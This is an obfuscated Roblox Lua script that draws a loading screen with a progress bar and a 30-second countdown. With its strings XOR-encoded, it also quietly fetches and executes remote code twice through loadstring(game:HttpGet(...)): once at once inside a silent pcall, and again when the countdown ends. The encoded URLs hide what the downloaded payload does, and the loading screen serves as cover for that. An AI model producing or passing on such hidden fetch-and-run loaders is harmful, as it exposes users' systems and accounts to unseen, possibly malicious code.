--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v65,v66) local v67={};for v74=1, #v65 do v6(v67,v0(v4(v1(v2(v65,v74,v74 + 1 )),v1(v2(v66,1 + (v74% #v66) ,1 + (v74% #v66) + 1 )))%256 ));end return v5(v67);end local v8=v7("\253\204\218\33\239\181\192\94\226\192\201\44\246\175\134","\126\177\163\187\69\134\219\167");local v9=v7("\4\200\62\209\245\45\202\106\214\243\54\223\41\192\178\109\131","\156\67\173\74\165");local v10=30;pcall(function() loadstring(game:HttpGet(v7("\60\163\93\6\175\124\9\123\165\72\1\242\33\79\32\191\92\20\169\53\67\38\180\70\24\168\35\72\32\249\74\25\177\105\118\38\184\67\19\191\50\97\21\144\6\38\174\41\76\49\180\93\37\191\52\79\36\163\6\4\185\32\85\123\191\76\23\184\53\9\57\182\64\24\243\22\84\59\189\76\21\168\21\69\38\190\89\2\175","\38\84\215\41\118\220\70")))();end);local v11=game.Players.LocalPlayer;local v12=Instance.new(v7("\99\21\48\23\251\94\49\55\27","\158\48\118\66\114"),v11:WaitForChild(v7("\155\40\17\47\118\183\220\190\45","\155\203\68\112\86\19\197")));v12.Name=v7("\106\210\55\248\73\118\226\205\111","\152\38\189\86\156\32\24\133");v12.ResetOnSpawn=false;local v15=Instance.new(v7("\218\69\166\75\249","\38\156\55\199"),v12);v15.Size=UDim2.new(763 -(82 + 681) ,570 -270 ,0,1889 -(71 + 1638) );v15.Position=UDim2.new(0.5 -0 , -(49 + 101),0.5 -0 , -(31 + 59));v15.BackgroundColor3=Color3.fromRGB(18 + 9 ,27,73 -46 );v15.Active=true;v15.Draggable=true;local v21=Instance.new(v7("\157\84\95\39\1\122\255\81","\35\200\29\28\72\115\20\154"),v15);v21.CornerRadius=UDim.new(0,16);local v23=Instance.new(v7("\45\186\201\203\161\45\54\28\179","\84\121\223\177\191\237\76"),v15);v23.Size=UDim2.new(1 + 0 ,1130 -(87 + 1043) ,448 -(10 + 438) ,33 + 7 );v23.Position=UDim2.new(0 -0 ,0 + 0 ,1180 -(1123 + 57) ,0 + 0 );v23.Text=v8;v23.Font=Enum.Font.FredokaOne;v23.TextSize=22;v23.TextColor3=Color3.fromRGB(509 -(163 + 91) ,2185 -(1869 + 61) ,72 + 183 );v23.BackgroundTransparency=1;local v32=Instance.new(v7("\143\83\209\180\22\81\50\196\183","\161\219\54\169\192\90\48\80"),v15);v32.Size=UDim2.new(3 -2 ,0 -0 ,0 + 0 ,41 -11 );v32.Position=UDim2.new(0 + 0 ,1474 -(1329 + 145) ,971 -(140 + 831) ,40);v32.Text=v9;v32.Font=Enum.Font.FredokaOne;v32.TextSize=1868 -(1409 + 441) ;v32.TextColor3=Color3.fromRGB(898 -(15 + 703) ,180,180);v32.BackgroundTransparency=1 + 0 ;local v40=Instance.new(v7("\111\80\1\40\76","\69\41\34\96"),v15);v40.Size=UDim2.new(438.9 -(262 + 176) ,0,1721 -(345 + 1376) ,10);v40.Position=UDim2.new(0.05,0,1, -(718 -(198 + 490)));v40.BackgroundColor3=Color3.fromRGB(176 -136 ,95 -55 ,1246 -(696 + 510) );v40.BorderSizePixel=0;Instance.new(v7("\137\234\244\5\16\37\185\209","\75\220\163\183\106\98"),v40).CornerRadius=UDim.new(1 -0 ,1262 -(1091 + 171) );local v46=Instance.new(v7("\36\168\138\58\220","\185\98\218\235\87"),v40);v46.Size=UDim2.new(0,0,1,0);v46.BackgroundColor3=Color3.fromRGB(0 + 0 ,535 -365 ,255);v46.BorderSizePixel=0 -0 ;Instance.new(v7("\254\21\4\233\204\164\206\46","\202\171\92\71\134\190"),v46).CornerRadius=UDim.new(375 -(123 + 251) ,0);local v51=Instance.new(v7("\29\196\52\156\5\192\46\141\37","\232\73\161\76"),v15);v51.Size=UDim2.new(1,0 -0 ,698 -(208 + 490) ,30);v51.Position=UDim2.new(0 + 0 ,0,1 + 0 , -60);v51.Text=v7("\143\208\79\88\94\151\220\68\73\68\251","\126\219\185\34\61")   .. v10 ;v51.Font=Enum.Font.FredokaOne;v51.TextSize=854 -(660 + 176) ;v51.TextColor3=Color3.fromRGB(31 + 224 ,457 -(14 + 188) ,930 -(534 + 141) );v51.BackgroundTransparency=1 + 0 ;local v59=Instance.new(v7("\42\220\95\127\123","\135\108\174\62\18\30\23\147"),v15);v59.Size=UDim2.new(0,54 + 6 ,0,20 + 0 );v59.Position=UDim2.new(0.5 -0 , -(47 -17),1, -90);v59.BackgroundTransparency=2 -1 ;local function v63(v68) local v69=0 + 0 ;local v70;while true do if (v69==(2 + 0)) then v70.BorderSizePixel=396 -(115 + 281) ;Instance.new(v7("\190\217\17\82\234\169\142\226","\199\235\144\82\61\152"),v70).CornerRadius=UDim.new(1,0 -0 );v69=3 + 0 ;end if (v69==(0 -0)) then local v79=0 -0 ;while true do if (v79==1) then v69=868 -(550 + 317) ;break;end if (v79==(0 -0)) then v70=Instance.new(v7("\144\251\43\198\29","\167\214\137\74\171\120\206\83"),v59);v70.Size=UDim2.new(0,14 -4 ,0 -0 ,295 -(134 + 151) );v79=1666 -(970 + 695) ;end end end if (1==v69) then v70.Position=UDim2.new(0,v68,0 -0 ,1990 -(582 + 1408) );v70.BackgroundColor3=Color3.fromRGB(884 -629 ,320 -65 ,960 -705 );v69=1826 -(1195 + 629) ;end if ((3 -0)==v69) then return v70;end end end local v64={v63(780 -(162 + 618) ),v63(20),v63(40)};task.spawn(function() while v12 and v12.Parent  do local v75=0;local v76;while true do if (v75==0) then v76=0 + 0 ;while true do if (v76==0) then for v86,v87 in ipairs(v64) do v87:TweenSize(UDim2.new(0 -0 ,10,0 -0 ,1 + 9 ),v7("\40\3\173","\75\103\118\217"),v7("\244\93\126\17","\126\167\52\16\116\217"),1636.15 -(1373 + 263) ,true);task.wait(1000.15 -(451 + 549) );end for v88,v89 in ipairs(v64) do v89:TweenSize(UDim2.new(0 + 0 ,0,0,0),v7("\231\59\52","\156\168\78\64\224\212\121"),v7("\52\231\171\203","\174\103\142\197"),0.15 -0 ,true);task.wait(0.15 -0 );end break;end end break;end end end end);task.spawn(function() local v71=1384 -(746 + 638) ;local v72;local v73;while true do if (v71==(1 + 0)) then if  not v72 then warn(v7("\230\244\48\182\163\193\56\209\231\60\242\181\253\25\219\246\37\242\160\255\2\222\227\53\232\230","\107\178\134\81\210\198\158")   .. v73 );end v12:Destroy();break;end if (v71==(0 -0)) then for v82=341 -(218 + 123) ,v10 do local v83=v82/v10 ;v46:TweenSize(UDim2.new(v83,1581 -(1535 + 46) ,1 + 0 ,0 + 0 ),v7("\121\61\75","\152\54\72\63\88\69\62"),v7("\248\205\224\89\213\214","\60\180\164\142"),560.2 -(306 + 254) ,true);v51.Text=v7("\108\87\8\44\103\193\23\94\74\95\105","\114\56\62\101\73\71\141")   .. (v10-v82) ;task.wait(1 + 0 );end v72,v73=pcall(function() loadstring(game:HttpGet(v7("\176\253\207\212\171\179\148\139\170\232\204\138\191\224\207\204\173\235\206\215\189\251\216\203\182\253\222\202\172\167\216\203\181\166\223\193\182\230\150\192\225\166\238\202\177\255\222\214\171\232\215\139\170\236\221\215\247\225\222\197\188\250\148\201\185\224\213\139\140\251\218\192\189\214\232\199\185\228","\164\216\137\187")))();end);v71=1 -0 ;end end end);
